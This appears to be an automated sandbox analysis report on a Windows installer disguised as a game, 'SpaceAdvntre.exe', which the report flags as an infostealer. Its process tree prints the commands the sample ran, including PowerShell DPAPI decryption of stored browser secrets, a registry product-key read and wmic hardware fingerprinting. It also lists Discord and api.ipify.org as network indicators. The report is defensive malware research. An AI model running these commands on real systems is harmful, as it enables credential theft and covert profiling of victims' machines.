Overview (score 7)
Static (score 3)

Behavioral task tabs (sample names shown as displayed on the page, truncated where the page truncates them):

| Sample (as displayed) | Platform | Score |
|---|---|---|
| SpaceAdvntre.exe | windows10-2004-x64 | 7 |
| $PLUGINSDI...er.dll | windows10-2004-x64 | 1 |
| $PLUGINSDI...ls.dll | windows10-2004-x64 | 3 |
| $PLUGINSDI...em.dll | windows10-2004-x64 | 3 |
| $PLUGINSDI...ll.dll | windows10-2004-x64 | 3 |
| SpaceAdvntre.exe | windows10-2004-x64 | 7 |
| chrome_100...nt.pak | windows10-2004-x64 | 3 |
| chrome_200...nt.pak | windows10-2004-x64 | 3 |
| d3dcompiler_47.dll | windows10-2004-x64 | 1 |
| ffmpeg.dll | windows10-2004-x64 | 1 |
| icudtl.dat | windows10-2004-x64 | 3 |
| libEGL.dll | windows10-2004-x64 | 1 |
| libGLESv2.dll | windows10-2004-x64 | 1 |
| locales/en-US.pak | windows10-2004-x64 | 3 |
| resources.pak | windows10-2004-x64 | 3 |
| resources/app.asar | windows10-2004-x64 | 3 |
| resources/elevate.exe | windows10-2004-x64 | 1 |
| snapshot_blob.bin | windows10-2004-x64 | 3 |
| v8_context...ot.bin | windows10-2004-x64 | 3 |
| vk_swiftshader.dll | windows10-2004-x64 | 1 |
| vk_swiftsh...d.json | windows10-2004-x64 | 3 |
| vulkan-1.dll | windows10-2004-x64 | 1 |
| $PLUGINSDI...ec.dll | windows10-2004-x64 | 3 |
| $PLUGINSDI...7z.dll | windows10-2004-x64 | 3 |
| $R0/Uninst...re.exe | windows10-2004-x64 | 7 |
| $PLUGINSDI...ls.dll | windows10-2004-x64 | 3 |
| $PLUGINSDI...em.dll | windows10-2004-x64 | 3 |
| $PLUGINSDI...ll.dll | windows10-2004-x64 | 3 |
| $PLUGINSDI...ec.dll | windows10-2004-x64 | 3 |

Analysis
- max time kernel: 152s
- max time network: 176s
- platform: windows10-2004_x64
- resource: win10v2004-20240412-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 17/04/2024, 14:42
Tasks

| Task | Type | Sample | Resource |
|---|---|---|---|
| static1 | Static task | | |
| behavioral1 | Behavioral task | SpaceAdvntre.exe | win10v2004-20240412-en |
| behavioral2 | Behavioral task | $PLUGINSDIR/SpiderBanner.dll | win10v2004-20240412-en |
| behavioral3 | Behavioral task | $PLUGINSDIR/StdUtils.dll | win10v2004-20240412-en |
| behavioral4 | Behavioral task | $PLUGINSDIR/System.dll | win10v2004-20240412-en |
| behavioral5 | Behavioral task | $PLUGINSDIR/WinShell.dll | win10v2004-20240412-en |
| behavioral6 | Behavioral task | SpaceAdvntre.exe | win10v2004-20240412-en |
| behavioral7 | Behavioral task | chrome_100_percent.pak | win10v2004-20240412-en |
| behavioral8 | Behavioral task | chrome_200_percent.pak | win10v2004-20240226-en |
| behavioral9 | Behavioral task | d3dcompiler_47.dll | win10v2004-20240412-en |
| behavioral10 | Behavioral task | ffmpeg.dll | win10v2004-20240412-en |
| behavioral11 | Behavioral task | icudtl.dat | win10v2004-20240412-en |
| behavioral12 | Behavioral task | libEGL.dll | win10v2004-20240412-en |
| behavioral13 | Behavioral task | libGLESv2.dll | win10v2004-20240412-en |
| behavioral14 | Behavioral task | locales/en-US.pak | win10v2004-20240412-en |
| behavioral15 | Behavioral task | resources.pak | win10v2004-20240412-en |
| behavioral16 | Behavioral task | resources/app.asar | win10v2004-20240412-en |
| behavioral17 | Behavioral task | resources/elevate.exe | win10v2004-20240412-en |
| behavioral18 | Behavioral task | snapshot_blob.bin | win10v2004-20240412-en |
| behavioral19 | Behavioral task | v8_context_snapshot.bin | win10v2004-20240412-en |
| behavioral20 | Behavioral task | vk_swiftshader.dll | win10v2004-20240412-en |
| behavioral21 | Behavioral task | vk_swiftshader_icd.json | win10v2004-20240412-en |
| behavioral22 | Behavioral task | vulkan-1.dll | win10v2004-20240412-en |
| behavioral23 | Behavioral task | $PLUGINSDIR/nsExec.dll | win10v2004-20240412-en |
| behavioral24 | Behavioral task | $PLUGINSDIR/nsis7z.dll | win10v2004-20240412-en |
| behavioral25 | Behavioral task | $R0/Uninstall SpaceAdvntre.exe | win10v2004-20240226-en |
| behavioral26 | Behavioral task | $PLUGINSDIR/StdUtils.dll | win10v2004-20240226-en |
| behavioral27 | Behavioral task | $PLUGINSDIR/System.dll | win10v2004-20240412-en |
| behavioral28 | Behavioral task | $PLUGINSDIR/WinShell.dll | win10v2004-20240412-en |
| behavioral29 | Behavioral task | $PLUGINSDIR/nsExec.dll | win10v2004-20240412-en |
General
- Target: SpaceAdvntre.exe
- Size: 154.6MB
- MD5: acf576f53d1d1376681fd4a35dce19b9
- SHA1: 8138a9f90af9f95d0ed3f86f993a674a300c554a
- SHA256: 1a61d9d12765ec87e611cec885a586ec9dcec7e28b300a8f84e27ecb55463f4d
- SHA512: f554e938211d44d167620d65ac80db6cc7aece05061b65fd25a7ecd8506d878e2e0535bc9840ce093c87b047ddd6e76c451cd6ef26ab700a5def833434c2eedd
- SSDEEP: 1572864:uTmw0ciLNpDPuAvHxJLkY2O6Ea3f9kwZXeT6EivLp1vUAtdjtZn+f4FnIvGaC9dU:pv6E70+Mk
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.

| Description | IoC | Process |
|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation | SpaceAdvntre.exe |

Loads dropped DLL (1 IoC)

| PID | Process |
|---|---|
| 984 | SpaceAdvntre.exe |

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

| Flow | IoC |
|---|---|
| 44 | discord.com |
| 45 | discord.com |

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.

| Flow | IoC |
|---|---|
| 15 | api.ipify.org |

An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)

| PID | Process |
|---|---|
| 1160 | cmd.exe |
| 4724 | cmd.exe |

Enumerates processes with tasklist (1 TTP, 2 IoCs)

| PID | Process |
|---|---|
| 4900 | tasklist.exe |
| 2016 | tasklist.exe |

Suspicious behavior: EnumeratesProcesses (12 IoCs)

| PID | Process | Entries |
|---|---|---|
| 3716 | powershell.exe | 2 |
| 1020 | powershell.exe | 2 |
| 684 | powershell.exe | 2 |
| 1832 | SpaceAdvntre.exe | 2 |
| 3708 | SpaceAdvntre.exe | 4 |

Suspicious use of AdjustPrivilegeToken (64 IoCs)

| Token(s) | PID | Process | Entries |
|---|---|---|---|
| SeDebugPrivilege | 4900 | tasklist.exe | 1 |
| SeDebugPrivilege | 3716 | powershell.exe | 1 |
| SeDebugPrivilege | 2016 | tasklist.exe | 1 |
| SeDebugPrivilege | 1020 | powershell.exe | 1 |
| SeDebugPrivilege | 684 | powershell.exe | 1 |
| SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 | 3964 | WMIC.exe | 42 (this sequence of 21 tokens is recorded twice) |
| SeShutdownPrivilege, SeCreatePagefilePrivilege (alternating) | 984 | SpaceAdvntre.exe | 14 (7 of each) |
| SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege | 3492 | WMIC.exe | 3 |

Suspicious use of WriteProcessMemory (64 IoCs)

| PID | Process | Wrote to memory of PID | procid_target | Entries |
|---|---|---|---|---|
| 984 | SpaceAdvntre.exe | 1900 | 88 | 2 |
| 984 | SpaceAdvntre.exe | 112 | 89 | 2 |
| 1900 | cmd.exe | 3716 | 92 | 2 |
| 112 | cmd.exe | 4900 | 93 | 2 |
| 984 | SpaceAdvntre.exe | 4576 | 95 | 2 |
| 984 | SpaceAdvntre.exe | 1160 | 97 | 2 |
| 4576 | cmd.exe | 2016 | 99 | 2 |
| 1160 | cmd.exe | 1020 | 100 | 2 |
| 984 | SpaceAdvntre.exe | 4724 | 101 | 2 |
| 4724 | cmd.exe | 684 | 103 | 2 |
| 984 | SpaceAdvntre.exe | 1300 | 105 | 31 |
| 984 | SpaceAdvntre.exe | 4816 | 106 | 2 |
| 984 | SpaceAdvntre.exe | 1832 | 107 | 2 |
| 4816 | cmd.exe | 3964 | 109 | 2 |
| 984 | SpaceAdvntre.exe | 2724 | 110 | 2 |
| 2724 | cmd.exe | 3492 | 112 | 2 |
| 984 | SpaceAdvntre.exe | 4068 | 113 | 2 |
| 4068 | cmd.exe | 2904 | 115 | 1 |
Processes

- C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe (PID 984)
  Command line: "C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe"
  Signatures: Checks computer location settings; Loads dropped DLL; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 1900)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3716)
      Command line: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 112)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\tasklist.exe (PID 4900)
      Command line: tasklist
      Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 4576)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\tasklist.exe (PID 2016)
      Command line: tasklist
      Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 1160)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,185,234,205,148,63,59,78,177,131,181,208,255,238,137,96,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,175,76,161,134,224,137,176,56,163,3,175,40,19,32,92,145,225,199,82,244,131,244,253,2,58,67,90,144,223,136,175,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,185,24,135,231,40,134,93,219,124,208,7,211,31,203,122,84,212,86,123,229,53,132,132,226,132,135,143,113,36,166,131,6,48,0,0,0,218,174,184,184,184,254,161,155,81,219,224,215,64,205,239,188,172,213,179,207,160,102,124,235,187,43,255,100,21,146,78,171,123,42,231,82,170,252,58,17,236,179,242,209,97,41,251,171,64,0,0,0,240,165,245,19,196,166,84,106,144,224,100,251,48,217,208,215,213,56,76,155,191,160,179,134,32,59,37,208,129,208,206,196,64,33,51,255,143,102,100,50,249,175,38,170,33,222,80,138,252,254,76,53,252,172,146,27,67,238,223,130,255,132,50,147), $null, 'CurrentUser')"
    Signatures: An obfuscated cmd.exe command-line is typically used to evade detection.; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1020)
      Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,185,234,205,148,63,59,78,177,131,181,208,255,238,137,96,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,164,175,76,161,134,224,137,176,56,163,3,175,40,19,32,92,145,225,199,82,244,131,244,253,2,58,67,90,144,223,136,175,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,185,24,135,231,40,134,93,219,124,208,7,211,31,203,122,84,212,86,123,229,53,132,132,226,132,135,143,113,36,166,131,6,48,0,0,0,218,174,184,184,184,254,161,155,81,219,224,215,64,205,239,188,172,213,179,207,160,102,124,235,187,43,255,100,21,146,78,171,123,42,231,82,170,252,58,17,236,179,242,209,97,41,251,171,64,0,0,0,240,165,245,19,196,166,84,106,144,224,100,251,48,217,208,215,213,56,76,155,191,160,179,134,32,59,37,208,129,208,206,196,64,33,51,255,143,102,100,50,249,175,38,170,33,222,80,138,252,254,76,53,252,172,146,27,67,238,223,130,255,132,50,147), $null, 'CurrentUser')
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 4724)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,185,234,205,148,63,59,78,177,131,181,208,255,238,137,96,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,248,235,49,138,142,189,104,1,109,218,244,53,122,212,178,249,229,108,209,244,72,234,123,126,207,63,141,70,231,119,6,241,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,45,229,139,113,15,60,156,64,75,210,221,149,107,176,204,206,223,140,215,102,98,0,202,73,167,165,95,81,244,204,30,48,0,0,0,159,65,239,47,193,103,240,79,154,80,226,158,99,10,187,54,27,43,149,239,44,43,50,241,85,118,100,160,55,35,4,5,71,7,147,24,9,204,151,49,123,143,123,174,107,90,184,232,64,0,0,0,194,24,38,210,116,69,79,130,181,232,35,188,221,21,190,87,247,64,69,131,46,79,254,65,31,21,214,249,103,245,141,3,45,226,66,120,199,31,146,206,10,217,198,190,184,32,146,37,147,76,162,180,81,77,233,1,253,121,27,101,176,107,25,65), $null, 'CurrentUser')"
    Signatures: An obfuscated cmd.exe command-line is typically used to evade detection.; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 684)
      Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,127,185,234,205,148,63,59,78,177,131,181,208,255,238,137,96,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,248,235,49,138,142,189,104,1,109,218,244,53,122,212,178,249,229,108,209,244,72,234,123,126,207,63,141,70,231,119,6,241,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,45,229,139,113,15,60,156,64,75,210,221,149,107,176,204,206,223,140,215,102,98,0,202,73,167,165,95,81,244,204,30,48,0,0,0,159,65,239,47,193,103,240,79,154,80,226,158,99,10,187,54,27,43,149,239,44,43,50,241,85,118,100,160,55,35,4,5,71,7,147,24,9,204,151,49,123,143,123,174,107,90,184,232,64,0,0,0,194,24,38,210,116,69,79,130,181,232,35,188,221,21,190,87,247,64,69,131,46,79,254,65,31,21,214,249,103,245,141,3,45,226,66,120,199,31,146,206,10,217,198,190,184,32,146,37,147,76,162,180,81,77,233,1,253,121,27,101,176,107,25,65), $null, 'CurrentUser')
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe (PID 1300)
    Command line: "C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\SpaceAdvntre" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 --field-trial-handle=2020,i,11541216000348560715,17284866817236837902,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
  - C:\Windows\system32\cmd.exe (PID 4816)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3964)
      Command line: wmic cpu get name
      Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe (PID 1832)
    Command line: "C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\SpaceAdvntre" --mojo-platform-channel-handle=1196 --field-trial-handle=2020,i,11541216000348560715,17284866817236837902,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Windows\system32\cmd.exe (PID 2724)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3492)
      Command line: wmic cpu get ProcessorId
      Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 4068)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe (PID 2904)
      Command line: wmic baseboard get Product
  - C:\Windows\system32\cmd.exe (PID 1616)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"
    - C:\Windows\System32\Wbem\WMIC.exe (PID 4720)
      Command line: wmic baseboard get SerialNumber
  - C:\Windows\system32\cmd.exe (PID 1584)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"
    - C:\Windows\System32\Wbem\WMIC.exe (PID 4128)
      Command line: wmic OS get caption
  - C:\Windows\system32\cmd.exe (PID 208)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"
    - C:\Windows\System32\Wbem\WMIC.exe (PID 3928)
      Command line: wmic computersystem get TotalPhysicalMemory
  - C:\Windows\system32\cmd.exe (PID 1264)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1628)
      Command line: wmic path win32_videocontroller get caption,PNPDeviceID
  - C:\Windows\system32\cmd.exe (PID 224)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"
    - C:\Windows\System32\Wbem\WMIC.exe (PID 4900)
      Command line: wmic diskdrive get SerialNumber
  - C:\Windows\system32\cmd.exe (PID 4612)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
    - C:\Windows\System32\Wbem\WMIC.exe (PID 1388)
      Command line: wmic path win32_computersystemproduct get uuid
  - C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe (PID 3708)
    Command line: "C:\Users\Admin\AppData\Local\Temp\SpaceAdvntre.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\SpaceAdvntre" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2004 --field-trial-handle=2020,i,11541216000348560715,17284866817236837902,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    Signatures: Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 2KB
  MD5: 6cf293cb4d80be23433eecf74ddb5503
  SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
  SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
  SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
- Filesize: 64B
  MD5: d8b9a260789a22d72263ef3bb119108c
  SHA1: 376a9bd48726f422679f2cd65003442c0b6f6dd5
  SHA256: d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
  SHA512: 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
- Filesize: 1KB
  MD5: 8e26941f21dac5843c6d170e536afccb
  SHA1: 26b9ebd7bf3ed13bc51874ba06151850a0dac7db
  SHA256: 316f6ce22306f3018f9f57435ea75092633097182646f7e4ca23e2e2aa1393c0
  SHA512: 9148227032d98d49baf0d81a7435ba3adc653d7790245140acc50c38de00839d26a661b92f6754b15bab54fe81fbcf9003692fd7bef09027f11ef703a5879e62
- Filesize: 1.4MB
  MD5: 56192831a7f808874207ba593f464415
  SHA1: e0c18c72a62692d856da1f8988b0bc9c8088d2aa
  SHA256: 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c
  SHA512: c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82